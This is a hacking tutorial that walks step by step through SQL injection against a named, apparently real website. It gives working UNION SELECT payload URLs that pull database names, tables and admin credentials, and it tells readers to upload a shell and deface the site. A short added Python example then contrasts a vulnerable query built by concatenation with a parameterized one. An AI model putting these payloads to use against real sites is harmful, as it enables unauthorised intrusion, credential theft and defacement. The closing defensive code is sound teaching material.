SQL Injection for Hacking a Vulnerable Website
Hacking a vulnerable website with SQL injection allows you to obtain usernames and passwords, possibly access the admin account, and from there you could do whatever you wanted to the website. When Anonymous hacked Sony and obtained personal information of thousands of users, they used an advanced form of this hack. This hack can be done from any computer or device with an internet connection and a browser.
- Find a vulnerable website. One way you can do this is by using what is called a Google dork. In the Hacking websites section of this app, you can find a huge list of dorks. Simply go to Google and type inurl:dorkhere
- When you have a target URL like: http://cadaboutdrugs.ie/news.php?id=82, add a ' at the end so it looks like http://cadaboutdrugs.ie/news.php?id=82'
- The site will be vulnerable to this hack if you get an error, or some of the website's content vanishes. If none of these things happen, this website is not vulnerable to SQLi.
- For the site used above, there is no error but content has vanished. It is vulnerable.
- Now try the ORDER BY syntax.
1 ORDER BY 2 ORDER BY 3 ORDER BY
4 ORDER BY
I have tried up to 90 but I can't find any error.
- The next step is to apply the UNION syntax.
- Now at UNION SELECT 1,2,3,4,5,6,7,8-- you will see some vulnerable numbers on screen, e.g. 2 3 4
- Now find the MySQL version, user, and database name.
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,@@version,user(),database(),5,6,7,8--
- Now you will see the following output :
5.1.49-log --> MySQL Version
aboutdr_admin@web8.novara.ie --> User
aboutdr_Test --> Database Name
- Now find all table names in the database.
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()--
- We got all our tables --> [about,carousel,contact,documents,donate,intro,links,members,news,services], among them the important table that stores the admin username and password --> members
- Find the column names of the members table. Go to the http://home2.paulschou.net/tools/xlate/ website.
- Copy members without quotes into the [ TEXT ] field and Press
- Now we get the value 109 101 109 98 101 114 115 from the [ DEC / CHAR ] field.
- Now our query to find the column names of the members table will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=CHAR(109,101,109,98,101,114,115)--
- Now we have all the column names from the members table --> id,username,password
- Now find the username and password. The query will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(id,0x3a,username,0x3a,password),3,4,5,6,7,8 FROM members--
- Here we got the id, username and password; 0x3a stands for --> [:] (colon)
- Now go to the home page of the site and click on Admin Login. Log in with the username and password and upload your shell; feel free to deface or upload any page.
As always, this is for educational purposes only. Use at your own risk.
I tried this server for root but unfortunately it's a patched server so it can't be rooted.
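
Why the single-quote test and the UNION step above work, and what stops them, as an added example that is not part of the original tutorial or the site's own code: a concatenated query beside a validated, parameterized one. The table contents, the function names and the use of SQLite in place of MySQL are assumptions made so the block runs offline.

```python
import re
import sqlite3


def make_db():
    """Build an in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE members (id INTEGER, username TEXT, password TEXT);
        INSERT INTO news VALUES (82, 'Sample article');
        INSERT INTO members VALUES (1, 'admin', 'constructed-hash');
    """)
    return conn


def news_vulnerable(conn, raw_id):
    """Weak pattern: the request parameter becomes part of the SQL text."""
    sql = "SELECT id, title FROM news WHERE id = " + raw_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return []  # a stray quote breaks the statement: "content vanishes"


def news_hardened(conn, raw_id):
    """Allowlist the expected type, then bind the value as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []  # reject (and log) anything that is not a plain integer
    sql = "SELECT id, title FROM news WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Constructed inputs modelled on the steps described above.
    for value in ("82", "82'", "-82 UNION SELECT username, password FROM members"):
        print(repr(value), news_vulnerable(db, value), news_hardened(db, value))
```

With the hardened handler, the quote and the UNION input never reach the SQL parser, so the members table stays out of reach even though it lives in the same database.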